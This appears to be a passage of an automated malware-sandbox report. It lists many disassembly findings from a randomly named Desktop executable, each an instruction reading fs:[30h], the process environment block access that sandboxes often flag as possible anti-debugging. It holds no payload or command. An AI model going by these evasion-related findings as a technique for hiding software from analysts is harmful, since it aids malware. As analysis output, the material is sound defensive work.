Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B656A mov eax, dword ptr fs:[00000030h] 4_2_014B656A
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01516500 mov eax, dword ptr fs:[00000030h] 4_2_01516500
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554500 mov eax, dword ptr fs:[00000030h] 4_2_01554500
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554500 mov eax, dword ptr fs:[00000030h] 4_2_01554500
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554500 mov eax, dword ptr fs:[00000030h] 4_2_01554500
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554500 mov eax, dword ptr fs:[00000030h] 4_2_01554500
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554500 mov eax, dword ptr fs:[00000030h] 4_2_01554500
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554500 mov eax, dword ptr fs:[00000030h] 4_2_01554500
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554500 mov eax, dword ptr fs:[00000030h] 4_2_01554500
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE53E mov eax, dword ptr fs:[00000030h] 4_2_014AE53E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE53E mov eax, dword ptr fs:[00000030h] 4_2_014AE53E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE53E mov eax, dword ptr fs:[00000030h] 4_2_014AE53E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE53E mov eax, dword ptr fs:[00000030h] 4_2_014AE53E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE53E mov eax, dword ptr fs:[00000030h] 4_2_014AE53E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490535 mov eax, dword ptr fs:[00000030h] 4_2_01490535
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490535 mov eax, dword ptr fs:[00000030h] 4_2_01490535
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490535 mov eax, dword ptr fs:[00000030h] 4_2_01490535
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490535 mov eax, dword ptr fs:[00000030h] 4_2_01490535
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490535 mov eax, dword ptr fs:[00000030h] 4_2_01490535
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490535 mov eax, dword ptr fs:[00000030h] 4_2_01490535
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE5CF mov eax, dword ptr fs:[00000030h] 4_2_014BE5CF
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE5CF mov eax, dword ptr fs:[00000030h] 4_2_014BE5CF
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014865D0 mov eax, dword ptr fs:[00000030h] 4_2_014865D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA5D0 mov eax, dword ptr fs:[00000030h] 4_2_014BA5D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA5D0 mov eax, dword ptr fs:[00000030h] 4_2_014BA5D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BC5ED mov eax, dword ptr fs:[00000030h] 4_2_014BC5ED
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BC5ED mov eax, dword ptr fs:[00000030h] 4_2_014BC5ED
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014825E0 mov eax, dword ptr fs:[00000030h] 4_2_014825E0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_014AE5E7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_014AE5E7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_014AE5E7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_014AE5E7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_014AE5E7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_014AE5E7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_014AE5E7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE5E7 mov eax, dword ptr fs:[00000030h] 4_2_014AE5E7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B4588 mov eax, dword ptr fs:[00000030h] 4_2_014B4588
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01482582 mov eax, dword ptr fs:[00000030h] 4_2_01482582
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01482582 mov ecx, dword ptr fs:[00000030h] 4_2_01482582
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE59C mov eax, dword ptr fs:[00000030h] 4_2_014BE59C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015005A7 mov eax, dword ptr fs:[00000030h] 4_2_015005A7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015005A7 mov eax, dword ptr fs:[00000030h] 4_2_015005A7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015005A7 mov eax, dword ptr fs:[00000030h] 4_2_015005A7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A45B1 mov eax, dword ptr fs:[00000030h] 4_2_014A45B1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A45B1 mov eax, dword ptr fs:[00000030h] 4_2_014A45B1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0153A456 mov eax, dword ptr fs:[00000030h] 4_2_0153A456
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h] 4_2_014BE443
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h] 4_2_014BE443
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h] 4_2_014BE443
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h] 4_2_014BE443
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h] 4_2_014BE443
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h] 4_2_014BE443
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h] 4_2_014BE443
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BE443 mov eax, dword ptr fs:[00000030h] 4_2_014BE443
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A245A mov eax, dword ptr fs:[00000030h] 4_2_014A245A
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147645D mov eax, dword ptr fs:[00000030h] 4_2_0147645D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150C460 mov ecx, dword ptr fs:[00000030h] 4_2_0150C460
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AA470 mov eax, dword ptr fs:[00000030h] 4_2_014AA470
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AA470 mov eax, dword ptr fs:[00000030h] 4_2_014AA470
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AA470 mov eax, dword ptr fs:[00000030h] 4_2_014AA470
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B8402 mov eax, dword ptr fs:[00000030h] 4_2_014B8402
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B8402 mov eax, dword ptr fs:[00000030h] 4_2_014B8402
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B8402 mov eax, dword ptr fs:[00000030h] 4_2_014B8402
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147C427 mov eax, dword ptr fs:[00000030h] 4_2_0147C427
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147E420 mov eax, dword ptr fs:[00000030h] 4_2_0147E420
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147E420 mov eax, dword ptr fs:[00000030h] 4_2_0147E420
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147E420 mov eax, dword ptr fs:[00000030h] 4_2_0147E420
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01506420 mov eax, dword ptr fs:[00000030h] 4_2_01506420
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01506420 mov eax, dword ptr fs:[00000030h] 4_2_01506420
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01506420 mov eax, dword ptr fs:[00000030h] 4_2_01506420
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01506420 mov eax, dword ptr fs:[00000030h] 4_2_01506420
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01506420 mov eax, dword ptr fs:[00000030h] 4_2_01506420
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01506420 mov eax, dword ptr fs:[00000030h] 4_2_01506420
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01506420 mov eax, dword ptr fs:[00000030h] 4_2_01506420
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA430 mov eax, dword ptr fs:[00000030h] 4_2_014BA430
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014804E5 mov ecx, dword ptr fs:[00000030h] 4_2_014804E5
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0153A49A mov eax, dword ptr fs:[00000030h] 4_2_0153A49A
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150A4B0 mov eax, dword ptr fs:[00000030h] 4_2_0150A4B0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014864AB mov eax, dword ptr fs:[00000030h] 4_2_014864AB
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B44B0 mov ecx, dword ptr fs:[00000030h] 4_2_014B44B0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01504755 mov eax, dword ptr fs:[00000030h] 4_2_01504755
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B674D mov esi, dword ptr fs:[00000030h] 4_2_014B674D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B674D mov eax, dword ptr fs:[00000030h] 4_2_014B674D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B674D mov eax, dword ptr fs:[00000030h] 4_2_014B674D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150E75D mov eax, dword ptr fs:[00000030h] 4_2_0150E75D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01480750 mov eax, dword ptr fs:[00000030h] 4_2_01480750
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2750 mov eax, dword ptr fs:[00000030h] 4_2_014C2750
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2750 mov eax, dword ptr fs:[00000030h] 4_2_014C2750
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01488770 mov eax, dword ptr fs:[00000030h] 4_2_01488770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490770 mov eax, dword ptr fs:[00000030h] 4_2_01490770
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BC700 mov eax, dword ptr fs:[00000030h] 4_2_014BC700
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01480710 mov eax, dword ptr fs:[00000030h] 4_2_01480710
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B0710 mov eax, dword ptr fs:[00000030h] 4_2_014B0710
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BC720 mov eax, dword ptr fs:[00000030h] 4_2_014BC720
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BC720 mov eax, dword ptr fs:[00000030h] 4_2_014BC720
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B273C mov eax, dword ptr fs:[00000030h] 4_2_014B273C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B273C mov ecx, dword ptr fs:[00000030h] 4_2_014B273C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B273C mov eax, dword ptr fs:[00000030h] 4_2_014B273C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FC730 mov eax, dword ptr fs:[00000030h] 4_2_014FC730
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148C7C0 mov eax, dword ptr fs:[00000030h] 4_2_0148C7C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015007C3 mov eax, dword ptr fs:[00000030h] 4_2_015007C3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A27ED mov eax, dword ptr fs:[00000030h] 4_2_014A27ED
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A27ED mov eax, dword ptr fs:[00000030h] 4_2_014A27ED
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A27ED mov eax, dword ptr fs:[00000030h] 4_2_014A27ED
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150E7E1 mov eax, dword ptr fs:[00000030h] 4_2_0150E7E1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014847FB mov eax, dword ptr fs:[00000030h] 4_2_014847FB
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014847FB mov eax, dword ptr fs:[00000030h] 4_2_014847FB
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152678E mov eax, dword ptr fs:[00000030h] 4_2_0152678E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014807AF mov eax, dword ptr fs:[00000030h] 4_2_014807AF
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015347A0 mov eax, dword ptr fs:[00000030h] 4_2_015347A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149C640 mov eax, dword ptr fs:[00000030h] 4_2_0149C640
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA660 mov eax, dword ptr fs:[00000030h] 4_2_014BA660
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA660 mov eax, dword ptr fs:[00000030h] 4_2_014BA660
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154866E mov eax, dword ptr fs:[00000030h] 4_2_0154866E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154866E mov eax, dword ptr fs:[00000030h] 4_2_0154866E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B2674 mov eax, dword ptr fs:[00000030h] 4_2_014B2674
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149260B mov eax, dword ptr fs:[00000030h] 4_2_0149260B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149260B mov eax, dword ptr fs:[00000030h] 4_2_0149260B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149260B mov eax, dword ptr fs:[00000030h] 4_2_0149260B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149260B mov eax, dword ptr fs:[00000030h] 4_2_0149260B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149260B mov eax, dword ptr fs:[00000030h] 4_2_0149260B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149260B mov eax, dword ptr fs:[00000030h] 4_2_0149260B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149260B mov eax, dword ptr fs:[00000030h] 4_2_0149260B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE609 mov eax, dword ptr fs:[00000030h] 4_2_014FE609
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2619 mov eax, dword ptr fs:[00000030h] 4_2_014C2619
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148262C mov eax, dword ptr fs:[00000030h] 4_2_0148262C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B6620 mov eax, dword ptr fs:[00000030h] 4_2_014B6620
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B8620 mov eax, dword ptr fs:[00000030h] 4_2_014B8620
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149E627 mov eax, dword ptr fs:[00000030h] 4_2_0149E627
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA6C7 mov ebx, dword ptr fs:[00000030h] 4_2_014BA6C7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA6C7 mov eax, dword ptr fs:[00000030h] 4_2_014BA6C7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015006F1 mov eax, dword ptr fs:[00000030h] 4_2_015006F1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015006F1 mov eax, dword ptr fs:[00000030h] 4_2_015006F1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE6F2 mov eax, dword ptr fs:[00000030h] 4_2_014FE6F2
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE6F2 mov eax, dword ptr fs:[00000030h] 4_2_014FE6F2
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE6F2 mov eax, dword ptr fs:[00000030h] 4_2_014FE6F2
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE6F2 mov eax, dword ptr fs:[00000030h] 4_2_014FE6F2
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01484690 mov eax, dword ptr fs:[00000030h] 4_2_01484690
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01484690 mov eax, dword ptr fs:[00000030h] 4_2_01484690
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BC6A6 mov eax, dword ptr fs:[00000030h] 4_2_014BC6A6
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B66B0 mov eax, dword ptr fs:[00000030h] 4_2_014B66B0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554940 mov eax, dword ptr fs:[00000030h] 4_2_01554940
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01500946 mov eax, dword ptr fs:[00000030h] 4_2_01500946
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C096E mov eax, dword ptr fs:[00000030h] 4_2_014C096E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C096E mov edx, dword ptr fs:[00000030h] 4_2_014C096E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C096E mov eax, dword ptr fs:[00000030h] 4_2_014C096E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A6962 mov eax, dword ptr fs:[00000030h] 4_2_014A6962
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A6962 mov eax, dword ptr fs:[00000030h] 4_2_014A6962
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A6962 mov eax, dword ptr fs:[00000030h] 4_2_014A6962
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01524978 mov eax, dword ptr fs:[00000030h] 4_2_01524978
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01524978 mov eax, dword ptr fs:[00000030h] 4_2_01524978
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150C97C mov eax, dword ptr fs:[00000030h] 4_2_0150C97C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150C912 mov eax, dword ptr fs:[00000030h] 4_2_0150C912
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE908 mov eax, dword ptr fs:[00000030h] 4_2_014FE908
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE908 mov eax, dword ptr fs:[00000030h] 4_2_014FE908
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01478918 mov eax, dword ptr fs:[00000030h] 4_2_01478918
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01478918 mov eax, dword ptr fs:[00000030h] 4_2_01478918
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150892A mov eax, dword ptr fs:[00000030h] 4_2_0150892A
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0151892B mov eax, dword ptr fs:[00000030h] 4_2_0151892B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154A9D3 mov eax, dword ptr fs:[00000030h] 4_2_0154A9D3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015169C0 mov eax, dword ptr fs:[00000030h] 4_2_015169C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A9D0 mov eax, dword ptr fs:[00000030h] 4_2_0148A9D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A9D0 mov eax, dword ptr fs:[00000030h] 4_2_0148A9D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A9D0 mov eax, dword ptr fs:[00000030h] 4_2_0148A9D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A9D0 mov eax, dword ptr fs:[00000030h] 4_2_0148A9D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A9D0 mov eax, dword ptr fs:[00000030h] 4_2_0148A9D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A9D0 mov eax, dword ptr fs:[00000030h] 4_2_0148A9D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B49D0 mov eax, dword ptr fs:[00000030h] 4_2_014B49D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150E9E0 mov eax, dword ptr fs:[00000030h] 4_2_0150E9E0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B29F9 mov eax, dword ptr fs:[00000030h] 4_2_014B29F9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B29F9 mov eax, dword ptr fs:[00000030h] 4_2_014B29F9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015089B3 mov esi, dword ptr fs:[00000030h] 4_2_015089B3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015089B3 mov eax, dword ptr fs:[00000030h] 4_2_015089B3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015089B3 mov eax, dword ptr fs:[00000030h] 4_2_015089B3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014809AD mov eax, dword ptr fs:[00000030h] 4_2_014809AD
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014809AD mov eax, dword ptr fs:[00000030h] 4_2_014809AD
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014929A0 mov eax, dword ptr fs:[00000030h] 4_2_014929A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01492840 mov ecx, dword ptr fs:[00000030h] 4_2_01492840
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01484859 mov eax, dword ptr fs:[00000030h] 4_2_01484859
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01484859 mov eax, dword ptr fs:[00000030h] 4_2_01484859
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B0854 mov eax, dword ptr fs:[00000030h] 4_2_014B0854
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01516870 mov eax, dword ptr fs:[00000030h] 4_2_01516870
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01516870 mov eax, dword ptr fs:[00000030h] 4_2_01516870
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150E872 mov eax, dword ptr fs:[00000030h] 4_2_0150E872
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150E872 mov eax, dword ptr fs:[00000030h] 4_2_0150E872
